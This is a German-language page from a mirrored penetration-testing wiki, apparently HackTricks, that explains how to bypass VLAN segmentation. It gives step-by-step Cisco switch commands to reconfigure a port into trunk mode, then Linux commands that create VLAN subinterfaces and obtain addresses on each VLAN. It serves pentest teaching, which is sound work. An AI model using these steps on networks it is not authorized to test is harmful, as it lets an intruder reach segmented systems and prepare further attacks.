mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
56 lines
3.0 KiB
Markdown
56 lines
3.0 KiB
Markdown
# Lateral VLAN Segmentation Bypass
|
|
|
|
{{#include ../../banners/hacktricks-training.md}}
|
|
|
|
Wenn direkter Zugriff auf einen Switch verfügbar ist, kann die VLAN-Segmentierung umgangen werden. Dies beinhaltet die Neukonfiguration des verbundenen Ports in den Trunk-Modus, das Einrichten virtueller Schnittstellen für die Ziel-VLANs und das Festlegen von IP-Adressen, entweder dynamisch (DHCP) oder statisch, je nach Szenario (**für weitere Details siehe [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)).**
|
|
|
|
Zunächst ist die Identifizierung des spezifischen verbundenen Ports erforderlich. Dies kann typischerweise durch CDP-Nachrichten oder durch die Suche nach dem Port über die **include**-Maske erreicht werden.
|
|
|
|
**Wenn CDP nicht funktioniert, kann die Portidentifizierung versucht werden, indem nach der MAC-Adresse gesucht wird**:
|
|
```
|
|
SW1(config)# show mac address-table | include 0050.0000.0500
|
|
```
|
|
Vor dem Wechsel in den Trunk-Modus sollte eine Liste der vorhandenen VLANs erstellt und deren Identifikatoren bestimmt werden. Diese Identifikatoren werden dann der Schnittstelle zugewiesen, um den Zugriff auf verschiedene VLANs über den Trunk zu ermöglichen. Der verwendete Port ist beispielsweise mit VLAN 10 verbunden.
|
|
```
|
|
SW1# show vlan brief
|
|
```
|
|
**Der Übergang in den Trunk-Modus beinhaltet das Betreten des Schnittstellenkonfigurationsmodus**:
|
|
```
|
|
SW1(config)# interface GigabitEthernet 0/2
|
|
SW1(config-if)# switchport trunk encapsulation dot1q
|
|
SW1(config-if)# switchport mode trunk
|
|
```
|
|
Der Wechsel in den Trunk-Modus wird vorübergehend die Konnektivität stören, aber dies kann anschließend wiederhergestellt werden.
|
|
|
|
Virtuelle Schnittstellen werden dann erstellt, VLAN-IDs zugewiesen und aktiviert:
|
|
```bash
|
|
sudo vconfig add eth0 10
|
|
sudo vconfig add eth0 20
|
|
sudo vconfig add eth0 50
|
|
sudo vconfig add eth0 60
|
|
sudo ifconfig eth0.10 up
|
|
sudo ifconfig eth0.20 up
|
|
sudo ifconfig eth0.50 up
|
|
sudo ifconfig eth0.60 up
|
|
```
|
|
Anschließend wird eine Adressanforderung über DHCP gestellt. Alternativ können in Fällen, in denen DHCP nicht möglich ist, Adressen manuell konfiguriert werden:
|
|
```bash
|
|
sudo dhclient -v eth0.10
|
|
sudo dhclient -v eth0.20
|
|
sudo dhclient -v eth0.50
|
|
sudo dhclient -v eth0.60
|
|
```
|
|
Beispiel für das manuelle Festlegen einer statischen IP-Adresse auf einer Schnittstelle (VLAN 10):
|
|
```bash
|
|
sudo ifconfig eth0.10 10.10.10.66 netmask 255.255.255.0
|
|
```
|
|
Die Konnektivität wird getestet, indem ICMP-Anfragen an die Standardgateways für die VLANs 10, 20, 50 und 60 gesendet werden.
|
|
|
|
Letztendlich ermöglicht dieser Prozess das Umgehen der VLAN-Segmentierung, wodurch ungehinderter Zugriff auf jedes VLAN-Netzwerk ermöglicht wird und die Grundlage für nachfolgende Aktionen geschaffen wird.
|
|
|
|
## References
|
|
|
|
- [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
|
|
|
|
{{#include ../../banners/hacktricks-training.md}}
|